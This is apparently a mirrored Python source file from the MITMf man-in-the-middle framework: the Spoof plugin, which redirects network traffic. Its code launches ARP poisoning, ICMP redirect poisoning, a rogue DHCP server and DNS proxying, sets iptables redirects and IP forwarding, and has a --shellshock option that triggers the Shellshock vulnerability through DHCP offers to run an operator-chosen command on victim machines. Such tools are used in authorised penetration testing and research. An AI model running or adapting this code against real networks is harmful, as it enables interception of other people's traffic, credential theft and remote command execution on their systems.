mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 21:42:17 -07:00
d56ce5447e
Issue #106 was caused by a 'None' value being returned when BeEF was unable to detect the hooked browser's OS Issue #109 was probably caused by locked resources when send() and sendp() where being called, adding in sleep() seems to have resolved the issue (at least on my machine)
132 lines
5.5 KiB
Python
132 lines
5.5 KiB
Python
#!/usr/bin/env python2.7
|
|
|
|
# Copyright (c) 2014-2016 Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
|
|
from core.utils import SystemConfig, IpTables, shutdown
|
|
from core.protocols.arp.ARPpoisoner import ARPpoisoner
|
|
from core.protocols.arp.ARPWatch import ARPWatch
|
|
from core.dnschef.DNSchef import DNSChef
|
|
from core.protocols.dhcp.DHCPServer import DHCPServer
|
|
from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner
|
|
from plugins.plugin import Plugin
|
|
from scapy.all import *
|
|
|
|
class Spoof(Plugin):
|
|
name = "Spoof"
|
|
optname = "spoof"
|
|
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
|
version = "0.6"
|
|
has_opts = True
|
|
|
|
def initialize(self, options):
|
|
'''Called if plugin is enabled, passed the options namespace'''
|
|
self.options = options
|
|
self.dnscfg = self.config['MITMf']['DNS']
|
|
self.dhcpcfg = self.config['Spoof']['DHCP']
|
|
self.targets = options.targets
|
|
self.arpmode = options.arpmode or 'rep'
|
|
self.manualiptables = options.manualiptables
|
|
self.mymac = SystemConfig.getMAC(options.interface)
|
|
self.myip = SystemConfig.getIP(options.interface)
|
|
self.protocolInstances = []
|
|
|
|
#Makes scapy more verbose
|
|
debug = False
|
|
|
|
if options.arp:
|
|
|
|
if not options.gateway:
|
|
shutdown("[-] --arp argument requires --gateway")
|
|
|
|
if options.targets is None:
|
|
#if were poisoning whole subnet, start ARP-Watch
|
|
arpwatch = ARPWatch(options.gateway, self.myip, options.interface)
|
|
arpwatch.debug = debug
|
|
|
|
self.tree_info.append("ARPWatch online")
|
|
self.protocolInstances.append(arpwatch)
|
|
|
|
arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
|
|
arp.arpmode = self.arpmode
|
|
arp.debug = debug
|
|
|
|
self.protocolInstances.append(arp)
|
|
|
|
|
|
elif options.icmp:
|
|
|
|
if not options.gateway:
|
|
shutdown("[-] --icmp argument requires --gateway")
|
|
|
|
if not options.targets:
|
|
shutdown("[-] --icmp argument requires --targets")
|
|
|
|
icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, self.myip)
|
|
icmp.debug = debug
|
|
|
|
self.protocolInstances.append(icmp)
|
|
|
|
elif options.dhcp:
|
|
|
|
if options.targets:
|
|
shutdown("[-] --targets argument invalid when DCHP spoofing")
|
|
|
|
dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip, self.mymac)
|
|
dhcp.shellshock = options.shellshock
|
|
dhcp.debug = debug
|
|
self.protocolInstances.append(dhcp)
|
|
|
|
if options.dns:
|
|
|
|
if not options.manualiptables:
|
|
if IpTables.getInstance().dns is False:
|
|
IpTables.getInstance().DNS(self.dnscfg['port'])
|
|
|
|
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
|
shutdown("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
|
|
|
SystemConfig.setIpForwarding(1)
|
|
|
|
if not options.manualiptables:
|
|
if IpTables.getInstance().http is False:
|
|
IpTables.getInstance().HTTP(options.listen)
|
|
|
|
for protocol in self.protocolInstances:
|
|
protocol.start()
|
|
|
|
def pluginOptions(self, options):
|
|
group = options.add_mutually_exclusive_group(required=False)
|
|
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
|
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
|
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
|
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
|
|
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
|
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
|
options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
|
|
options.add_argument('--arpmode',type=str, dest='arpmode', default=None, choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
|
|
|
def finish(self):
|
|
for protocol in self.protocolInstances:
|
|
if hasattr(protocol, 'stop'):
|
|
protocol.stop()
|
|
|
|
if not self.manualiptables:
|
|
IpTables.getInstance().Flush()
|
|
|
|
SystemConfig.setIpForwarding(0)
|